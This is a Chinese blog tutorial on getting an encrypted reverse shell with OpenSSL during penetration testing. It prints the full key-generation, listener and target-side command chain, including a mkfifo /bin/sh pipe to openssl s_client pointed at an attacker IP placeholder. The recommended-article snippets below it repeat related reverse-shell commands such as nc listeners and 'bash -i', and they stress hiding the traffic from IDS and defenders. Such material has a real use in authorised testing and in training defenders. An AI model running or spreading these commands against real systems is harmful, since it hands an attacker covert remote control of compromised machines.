利用OpenSSL搭建一个反弹shell

最新推荐文章于 2024-08-13 17:50:19 发布
最新推荐文章于 2024-08-13 17:50:19 发布
阅读量605 收藏
点赞数 1

渗透测试时有很多方法可以获得一个反弹shell,例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用是Openssl来获得一个反弹shell。是的,就是那个几乎每个https都要使用的库,我们先用openssl来生成密钥,最后再使用它来获取一个反弹shell。

 

准备

首先我们需要在自己的机器上生成密钥,这里用kali来演示。

root@kali# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

启动监听(渗透机器)

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

反弹shell(目标机器)

最后在目标机器,也就是你所攻破的机器,运行如下命令:

low-user@pwned#: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s

from:https://nosec.org/home/detail/2280.html

猫屎一号_001
关注
Openssl反弹加密shell
干铮的博客
03-14 910
使用Openssl反弹加密shell 进行渗透测试得后渗透阶段为了进行横向渗透,往往需要反弹shell,如果反弹shell,如果反弹shell都是明文传输,如果内网有IDS或者防护软件会进行流量分析,很快被发现,如果攻击流量回溯分析。就可以复现攻击得过程,此时整个攻击就会被暴漏出来。 使用wireshark抓包直接看到输入得命令返回信息,这些命令会被WAF或者IPS所检测所以需要对这些信息进行加密。 ...
使用OpenSSL反弹shell
mirocky的博客
10-12 534
使用openssl进行反弹shell的过程
openssl命令_利用OpenSSL搭建一个反弹shell
weixin_39705069的博客
12-06 153
渗透测试时有很多方法可以获得一个反弹shell,例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用Openssl来获得一个反弹shell。是的,就是那个几乎每个https都要使用的库,我们先用openssl来生成密钥,最后再使用它来获取一个反弹shell。准备首先我们需要在自己的机器上生成密钥,这里用kali来演示。root@kali# openssl r...
openssl 来进行反弹shell
最新发布
Arzum的博客
08-13 170
1. 服务端开启两个监听,从 ip:port1 获取命令发送给 cmd.exe执行,然后结果返回到 ip:port2。3. 在目标上用openssl加密反弹shell的流量(使用openssl单向认证)2.服务端上监听反弹shell
利用OpenSSL加密反弹shell流量
The current road is different, love needs to distinguish between right and wrong
02-15 3283
简介 在进行后渗透阶段的时候通常为了进一步横向操作往往需要反弹 shell,但是反弹 shell 方式都有一个缺点,流量是以明文方式进行传输的。进行流量分析的话就会很快被发现,如果对攻击流量进行溯源分析,检测带有攻击的特征,就可以复现攻击过程。 实验环境 kali:192.168.95.128 centos:192.168.95.147 Wireshark抓包 在kali上使用nc监听一个端口 nc -lvvp 4444 将centos的shell反弹过去 bash -i
openssl命令_使用OpenSsl加密反弹shell
weixin_39713538的博客
11-24 350
一、实际环境:当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量,而且现在大部分企业内部都会有各种流量监测设备,所以在这种情况下当我们进行操作时,网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止,因此需要对通信内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密 shellOpenSSL ...
常用的一句话反弹shell总结
热门推荐
橘子女侠
05-20 1万+
目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...
利用平台的漏洞
qq_35192121的博客
11-07 135
在这一章节中,我们将使用 Hashcat 暴力破解哈希。SUID位:当在程序或脚本的属性中设置此位时,此类程序将在所有者用户的权限下执行而不是在执行它的用户的权限下执行。获取到目标主机的shell后我们尝试使用命 getsystem命快速提权,然而没有起作用,所以我们只好在 Explot-DB 数据中查找其他的可用的模块,该模块可直接用于metasploit中,只需要加载它并未它设置反向连接的IP 和端口即可,它便会利用我们已经获得到的session会话尝试执行提权操作,一旦成功,就会返回新的shell
流量加密技术
课嗨教育的专栏
09-09 1313
目录 一、使用 Openssl 反弹加密 shell ​ 二、MSF 流量加密躲避检测 一、使用 Openssl 反弹加密 shell 红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,往往 需要反弹 shell,如果反弹 shell 都是明文传输,那么内网里有 IDS 或者防护软件 会进行流量进行分析,检测带有攻击特征,很快被发现,如果蓝队对攻击流量回 溯分析,就可以复现攻击的过程。此时红队攻击就会暴漏出来,整个项目都要停 止。 使用 wireshark 抓包直接
运维知识点-linux操作系统-linux命令行-BashShell
aming小老弟
11-17 697
Yum(全称为 Yellow dog Updater, Modified)是一个在Fedora和RedHat以及CentOS中的Shell前端软件包管理器。基于RPM包管理,能够从指定的1、显示已经安装的软件包2、查找可以安装的软件包 (以 tomcat 为例)3、安装软件包 (以 tomcat 为例)4、卸载软件包 (以 tomcat 为例)5、列出软件包的依赖 (以 tomcat 为例)6、-y 自动应答yes我们可以用 -y 来应答所有的 yes , 比如我们安装 tomcat 的时候,
Webmin(CVE-2021-31760)CSRF-RCE环境搭建-漏洞复现
weixin_45006525的博客
04-29 1578
Webmin(CVE-2021-31760) 漏洞简介: Webmin是基于Web的界面的用于类Unix的系统管理工具。该工具基于BS架构,可以让你很轻易的使用任何现代的Web浏览器,很轻易的管理您的服务器。 近日,Webmin官方通告了三个CVE漏洞,包括CVE-2021-31760,CVE-2021-31761,CVE-2021-31762。远程攻击者可以通过社工管理员,通过CSRF漏洞以及XSS漏洞,实现对远程服务器的代码执行,进而控制并接管服务器。 以下复现第一个CVE-2021-31760 影响范
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
网络安全进阶篇之流量加密(十三章-1)使用 Openssl 反弹加密 shell
划水的小白白
05-19 912
文章目录零、什么是OpenSSL?一、为什么要进行流量加密二、抓取流量包三、对数据进行加密 零、什么是OpenSSL? 在计算机网络上,OpenSSL一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。 一、为什么要进行流量加密 红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,往往需要反弹 shell,如果反弹 shell 都是明文传输,那么内网里有 IDS 或者防护软件会进行流量进行分析,检测带有攻
红队隧道加密之OpenSSL加密反弹Shell(一)
xf555er的博客
11-26 999
OpenSSL一个开源的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上其主要库是以C语言所写成,实现了基本的加密功能,实现了SSL与TLS协议。OpenSSL 可以运行在OpenVMS、 Microsoft Windows以及绝大多数类Unix操作系统上(包括Solaris,Linux,Mac OS X与各种版本的开放源代码BSD操作系统)。它也提供了一个移植版本,可以在IBM i(OS/400)上运作。
OpenSSL反弹加密shell
redwand的博客
02-21 410
在进行红队渗透测试的后渗透阶段为了进一步横行渗透往往需要反弹 shell,这里列出了使用各种语言进行反弹 shell 的方法,我发现这种反弹 shell 方式都有一个缺点,那就是所有的流量都是明文传输的。本文介绍了openssl反弹加密shell的常规方法。
使用 OpenSSL 反弹加密 shell
weixin_30810583的博客
04-12 230
Referrence:https://xax007.github.io/2019-03-07-reverse-encrypted-shell-with-openssl/ 目录 前言 OpenSSL 简介 使用 OpenSSL 生成证书自签名证书 使用 OpenSSL 反弹加密 shell Linux Windows 使用 OpenSSL 搭建简易 HTTPS Ser...
反弹shell,一篇概括
m0_63733486的博客
06-17 111
在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。在计算机网络上,OpenSSL一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。
利用OpenSSL反弹shell进行流量加密
jqx_Gold的博客
05-23 342
测试环境 攻击机:192.168.137.129(Kali) 靶机:192.168.137.128(CentOS) 1、在攻击机上使用OpenSSL生成自签名证书 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes 2、 在攻击机上监听端口 openssl s_server -quiet -key key.pem -cert cert.pem -port [port] 3、在
反弹shell详细易懂讲解,看这一篇就够了
LCW991207的博客
05-26 1781
bash就是shell的众多小弟中的一个Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值